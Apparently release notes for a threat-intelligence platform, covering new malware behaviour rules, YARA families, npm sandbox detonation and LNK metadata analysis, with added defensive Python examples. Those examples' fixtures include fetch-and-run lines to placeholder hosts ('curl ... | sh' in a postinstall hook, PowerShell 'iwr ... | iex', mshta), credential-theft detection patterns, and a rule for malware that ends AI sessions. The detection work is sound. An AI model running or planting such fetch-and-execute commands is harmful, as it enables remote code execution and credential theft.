May 18th, 2026 - Automated Package Sandbox Detonation, Advanced Attribute Pivoting, Expanded Collections & Deep Malware Format Analysis in Agentic, CAPA Binary Enhancements, and more
📢 Google TI Mondays. Quick reminder to follow the Google TI Mondays series across our social platforms every week for quick, actionable practitioner tips and product adoption advice designed to improve your efficiency. #GoogleTIMondays
💪 Enhanced PE and ELF Binary Behavior Detections. CAPA, a tool maintained by the FLARE team, provides human-readable explanations of suspicious behavior that a binary may exhibit when executed. Our platform runs CAPA on all PE and ELF binaries and displays the results in the BEHAVIOR tab of the UI. CAPA has recently gained 26 new and 17 improved behavior detection rules, all of which are now integrated into our file analysis pipeline. The new rules focus on credential access, environment discovery, and defense evasion techniques observed in malware, including:
- behavior_signature:"terminate Anthropic session via magic strings": use magic strings to terminate Anthropic AI sessions.
- behavior_signature:"access AWS credentials": access AWS configuration and credential files.
- behavior_signature:"access Docker credentials": access Docker configuration and credential files.
- behavior_signature:"access GCP credentials": access Google Cloud Platform configuration and credential files.
- behavior_signature:"get custom HTTP header": retrieve custom HTTP headers.
- behavior_signature:"get HTTP response date": retrieve the Date header from an HTTP response.
- behavior_signature:"run as NodeJS native module": execute as a native module in NodeJS.
- behavior_signature:"persist via ShellServiceObjectDelayLoad registry key": maintain persistence by registering a COM object under the ShellServiceObjectDelayLoad registry key, which Explorer loads at logon.
Check out CAPA’s full release notes for more details.
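To show what a string-based rule of this kind actually checks, here is an added example (not Google TI's or the CAPA project's code): it extracts ASCII and UTF-16LE strings from a byte blob the way a `strings`-style pass does, then matches them against a small rule table whose names mirror the rules above. The match patterns are assumptions for illustration, not the real capa-rules content, and the binary image is constructed inline.

```python
"""Added example, not CAPA's own rules: minimal string extraction plus a
rule table approximating the credential-access and persistence rules named
on this page. Patterns are illustrative assumptions."""
import re
from typing import Dict, List

MIN_LEN = 6  # minimum run length, as in the classic `strings` tool

ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)  # UTF-16LE runs


def extract_strings(blob: bytes) -> List[str]:
    """Return printable ASCII and UTF-16LE strings in file order."""
    found = [(m.start(), m.group().decode("ascii")) for m in ASCII_RE.finditer(blob)]
    found += [(m.start(), m.group().decode("utf-16-le")) for m in WIDE_RE.finditer(blob)]
    return [s for _, s in sorted(found)]


# Illustrative rule set (assumed, not the real capa rule bodies): a rule
# fires when any of its patterns matches an extracted string.
RULES: Dict[str, List[re.Pattern]] = {
    "access AWS credentials": [
        re.compile(r"\.aws[\\/](credentials|config)$", re.I),
        re.compile(r"^AWS_(ACCESS_KEY_ID|SECRET_ACCESS_KEY)$"),
    ],
    "access Docker credentials": [re.compile(r"\.docker[\\/]config\.json$", re.I)],
    "access GCP credentials": [
        re.compile(r"gcloud[\\/](application_default_credentials\.json|credentials\.db)$", re.I),
        re.compile(r"^GOOGLE_APPLICATION_CREDENTIALS$"),
    ],
    "persist via ShellServiceObjectDelayLoad registry key": [
        re.compile(r"CurrentVersion\\ShellServiceObjectDelayLoad", re.I),
    ],
}


def match_behaviours(blob: bytes) -> Dict[str, List[str]]:
    """Map each matching rule name to the strings that triggered it."""
    hits: Dict[str, List[str]] = {}
    for s in extract_strings(blob):
        for name, patterns in RULES.items():
            if any(p.search(s) for p in patterns):
                hits.setdefault(name, []).append(s)
    return hits


# Constructed fake binary image: a mix of ASCII and UTF-16LE strings with
# non-printable bytes between them, as a real PE or ELF would have.
SAMPLE = (
    b"\x4d\x5a\x90\x00\x03\x00\x00\x00" + b"\x00" * 8
    + b"%USERPROFILE%\\.aws\\credentials\x00"
    + "Software\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad".encode("utf-16-le")
    + b"\x00\x00"
    + b"GOOGLE_APPLICATION_CREDENTIALS\x00"
    + b"\x7fELF\x01\x01\x01\x00"
    + b"~/.docker/config.json\x00"
)

if __name__ == "__main__":
    for rule, strings in match_behaviours(SAMPLE).items():
        print(f"{rule}: {strings}")
```

Real CAPA rules combine such string features with API calls, mnemonics and scope (function, basic block, file), so a single path string is weaker evidence than the platform's verdict; the point here is only to make visible what "access AWS credentials" is looking for.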
💪 Detection Highlights. The Google Threat Intelligence Group and FLARE team provide ongoing updates to Google TI's YARA rules. This week, we released YARA rules covering 5 newly tracked malware families. We prioritize the creation of new and updated detection content based on malware families actively observed in Mandiant incident response engagements, Google SecOps customer environments, and top Google TI search trends.
As we identify new malware families through our research, we develop and deploy detection signatures. Recent additions include:
- NEONSLIDE: a JavaScript-based downloader that displays full-page overlays leveraging the ClickFix technique to convince the user to copy and run a malicious command to download and execute a follow-on payload. It employs anti-analysis checks, fingerprints the victim environment, and tracks local execution state. Once verified, it downloads secondary JavaScript modules into the Document Object Model (DOM) to generate full-page overlays such as fake browser updates, Cloudflare checks, or Blue Screen of Death (BSOD) errors. NEONSLIDE retrieves its active command-and-control (C2 or C&C) server via either hard-coded URLs or blockchain smart contracts.
- DUSTMAKER: a heavily-obfuscated JavaScript credential stealer that harvests cloud and developer authentication tokens (including AWS, Azure, GCP, GitHub, and NPM) via local filesystem scans and built-in SDKs, exfiltrating the data via HTTP POST requests and secondary GitHub repositories.
- FIRESCALE: a modular, Python-based credential stealer and data theft payload that also incorporates a localized, conditional wiper. The malware concurrently deploys multiple collector modules to harvest cloud provider secrets, Kubernetes configurations, local developer credentials, and password manager vaults. Stolen data is aggregated, encrypted, and exfiltrated using a multi-tiered approach that falls back to GitHub dead drops if the primary command-and-control servers are unreachable. It also carries a targeted logic bomb: if it finds Israeli or Iranian geographic markers on the host, it triggers a destructive file wipe with a random probability.
- SHADOWRICE: a memory-only dropper written in VBScript that is often concealed within benign files. SHADOWRICE leverages COM objects for in-memory Base64 payload decoding to execute embedded PowerShell scripts. To evade detection, the dropper launches these scripts via temporary Windows Scheduled Tasks, effectively masking the malicious process chain.
- SILVERSHED: a .NET credential stealer that targets multiple browsers, such as Google Chrome and Microsoft Edge, and applications such as Telegram, FileZilla, and OpenVPN.
In addition to providing detection rules for new and emerging threats, we continue to update our detection systems for established threats like VIDAR, DARKCRYSTALRAT, and EMPIRE. These updates ensure that our YARA coverage remains robust against the latest variants and indicators observed in the wild.
See latest malware family profiles added to the knowledge base and the complete list of curated YARA rules in our database.
💪 Automated Sandbox Detonation for Node, NPM, and NPX Packages/Installers. The Google TI Dynamic Analysis Sandboxes provide an isolated, secure environment where submitted files are detonated in real time to observe their actual behavior, registry changes, network communications, and system modifications. This allows security analysts to uncover hidden, highly obfuscated, or time-delayed malicious payloads that static analysis alone might miss, turning unknown files into actionable behavioral intelligence.
When a user now submits a scripting file (such as a shell script, batch file, or PowerShell script) that installs a Node.js, npm, or npx package, the sandbox automatically detects the package manager call, runs the full package installation inside the isolated runtime, and monitors everything the package does. The captured telemetry, dropped files, and network connections are then populated under the BEHAVIOR tab of the file analysis report.
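The two things the sandbox has to get right here are spotting the package-manager call in the submitted script and then observing what the package runs at install time. The added example below (not Google TI sandbox code) shows both halves in miniature: it tokenizes a shell installer with Python's `shlex`, splits compound lines on `&&`, `;` and `|`, reports every `npm install`/`npx` invocation with its package spec, and lists the npm lifecycle hooks in a `package.json` that execute automatically when the package is installed as a dependency. The installer script and `package.json` are constructed for illustration.

```python
"""Added example, not Google TI's sandbox code: find npm/npx package
installs in a script and list the install-time hooks of a package.
Sample inputs below are constructed for illustration."""
import json
import shlex
from typing import Dict, List, Tuple

# npm sub-commands (and aliases) that fetch and install or execute code.
NPM_INSTALL_CMDS = {"install", "i", "add", "ci", "exec", "x"}
# Lifecycle scripts npm runs automatically when a dependency is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
SEPARATORS = {"&&", "||", ";", "|", "&", "(", ")"}


def simple_commands(line: str):
    """Yield argv lists for each simple command on a shell line (quote-aware)."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    argv: List[str] = []
    for tok in lexer:
        if tok in SEPARATORS:
            if argv:
                yield argv
            argv = []
        else:
            argv.append(tok)
    if argv:
        yield argv


def find_package_manager_calls(script: str) -> List[Tuple[str, List[str]]]:
    """Return (tool, package specs) for every npm install-style or npx call."""
    calls: List[Tuple[str, List[str]]] = []
    for line in script.splitlines():
        for argv in simple_commands(line):
            tool = argv[0].rsplit("/", 1)[-1]  # tolerate /usr/bin/npm
            if tool == "npm" and len(argv) > 1 and argv[1] in NPM_INSTALL_CMDS:
                calls.append(("npm", [a for a in argv[2:] if not a.startswith("-")]))
            elif tool == "npx":
                # first non-flag argument is the package (or binary) npx fetches
                calls.append(("npx", [a for a in argv[1:] if not a.startswith("-")][:1]))
    return calls


def install_time_hooks(package_json: str) -> Dict[str, str]:
    """Return the lifecycle scripts npm would run on installation of this package."""
    scripts = json.loads(package_json).get("scripts", {})
    return {k: scripts[k] for k in INSTALL_HOOKS if k in scripts}


# Constructed installer script, in the shape the sandbox feature is about.
SAMPLE_SCRIPT = """#!/bin/sh
# constructed installer for illustration
set -e
curl -fsSL https://example.invalid/setup.sh | bash -
npm install -g typescript@5 && npx -y cowsay hello
cd /opt/app; npm ci
"""

# Constructed package manifest with a code-executing postinstall hook.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "totally-fine-lib",
    "version": "1.0.0",
    "scripts": {
        "test": "jest",
        "postinstall": "node -e \"require('child_process').exec('curl http://example.invalid/x | sh')\"",
    },
})

if __name__ == "__main__":
    print(find_package_manager_calls(SAMPLE_SCRIPT))
    print(install_time_hooks(SAMPLE_PACKAGE_JSON))
```

The hook list is the part that matters for triage: a dependency with a `postinstall` that spawns `node -e` or a shell is exactly the behaviour the detonation report surfaces as process and network activity, and `npm install --ignore-scripts` is the corresponding hardening on the developer side.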
💪 Agentic Evolution: Expanded Object Collections Creation. Agentic is an AI-powered analysis interface built to automate complex investigative workflows within Google Threat Intelligence. By leveraging specialized agents with direct access to our vast threat intelligence dataset, users can rapidly summarize threats, analyze malicious logic, and pivot through infrastructure using natural language. Agentic acts as a force multiplier for security teams, transforming tedious manual hunting and pivoting into conversational tasks.
We have significantly upgraded Agentic's workflow generation capabilities. Agentic can now automatically create and organize advanced threat intelligence object collections from natural language commands. Users can instruct the agent to build private, structured collections of Campaigns, Threat Actors, Reports, Malware Families, and other object types.
💪 Agentic Deep Structural Metadata Analysis for LNK, VBA, and .NET Formats. Agentic can now perform deep structural metadata analysis, including frequency distributions over specific internal metadata fields, for three malware delivery formats that matter most in current intrusions:
- LNK (Windows Shortcuts)
- VBA (Office Macros)
- DotNet / .NET (Compiled Binaries)
Prompt examples:
- “I would like to obtain aggregations based on LNK files and the target binary used in their metadata, only from those submitted in the last 30 days and having 5 positives”
- “Obtain samples related to asyncrat and then tell me the most used type definitions to understand behavior related to this family”
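The first prompt asks for an aggregation over the target binary recorded in LNK metadata. As an added example (not Agentic or Google TI code) of the structure such an aggregation reads, the block below parses the Shell Link header and StringData section per MS-SHLLINK (header size 0x4C, the Shell Link CLSID, LinkFlags, then the RelativePath, WorkingDir and CommandLineArguments strings), skips the optional LinkTargetIDList and LinkInfo blocks, and counts target binaries across a small corpus. The `.lnk` blobs are constructed in the block itself, and decoding non-Unicode strings as cp1252 is an assumption (the format uses the system code page).

```python
"""Added example, not Agentic code: minimal .LNK header/StringData parser
and a target-binary frequency count. Sample shortcuts are constructed here."""
import struct
from collections import Counter
from typing import Dict, List

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-000000000046}
HEADER_LEN = 0x4C

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
IS_UNICODE = 0x80
# StringData entries follow in this order, each present only if its flag is set.
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]


def parse_lnk(data: bytes) -> Dict[str, object]:
    """Parse LinkFlags and StringData; raise ValueError if not a Shell Link."""
    if (len(data) < HEADER_LEN or struct.unpack_from("<I", data)[0] != HEADER_LEN
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    offset = HEADER_LEN
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) + item IDs
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) covers the whole block
        offset += struct.unpack_from("<I", data, offset)[0]
    out: Dict[str, object] = {"flags": flags}
    for bit, field in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, offset)[0]  # CountCharacters
        offset += 2
        if flags & IS_UNICODE:
            out[field] = data[offset:offset + 2 * count].decode("utf-16-le")
            offset += 2 * count
        else:
            out[field] = data[offset:offset + count].decode("cp1252")  # assumed code page
            offset += count
    return out


def build_lnk(relative_path: str, arguments: str, working_dir: str = ".") -> bytes:
    """Construct a minimal Unicode .lnk carrying only StringData (test fixture)."""
    flags = 0x08 | 0x10 | 0x20 | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_LEN, LNK_CLSID, flags,
                         0x20,          # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,       # creation/access/write FILETIME (unset)
                         0, 0,          # FileSize, IconIndex
                         1,             # ShowCommand = SW_SHOWNORMAL
                         0, 0, 0, 0)    # HotKey, Reserved1-3
    body = b""
    for s in (relative_path, working_dir, arguments):   # StringData order
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


def target_binary(meta: Dict[str, object]) -> str:
    """Basename of the relative target path, lower-cased (e.g. 'powershell.exe')."""
    path = str(meta.get("relative_path", ""))
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def aggregate_targets(blobs: List[bytes]) -> Counter:
    """Frequency of target binaries over a corpus, skipping non-LNK input."""
    counts: Counter = Counter()
    for blob in blobs:
        try:
            counts[target_binary(parse_lnk(blob))] += 1
        except ValueError:
            continue
    return counts


# Constructed corpus resembling lure shortcuts; none of these are real samples.
SAMPLES = [
    build_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              '-w hidden -ep bypass -c "iwr http://example.invalid/a | iex"'),
    build_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "-nop -w hidden -enc AAAA"),
    build_lnk(r"..\..\Windows\System32\cmd.exe", "/c start mshta http://example.invalid/b"),
    b"MZ\x90\x00not a shortcut",
]

if __name__ == "__main__":
    print(parse_lnk(SAMPLES[0]))
    print(aggregate_targets(SAMPLES))
```

A production parser would also walk LinkInfo (volume and local base path) and the ExtraData blocks, in particular TrackerDataBlock machine IDs and EnvironmentVariableDataBlock paths, which are often the fields worth aggregating across a campaign; the StringData fields above are the ones the prompt refers to.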
💪 Relevant Attribute Pivoting in Agentic for Similarity Hunting. We have enhanced Agentic’s ability to pivot across IoC relationships by leveraging the Get Entity Prevalence tool to analyze key threat attributes. This optimization allows the agent to automatically surface critical data relationships, enabling analysts to identify similar entities and map out related infrastructure with significantly greater accuracy.
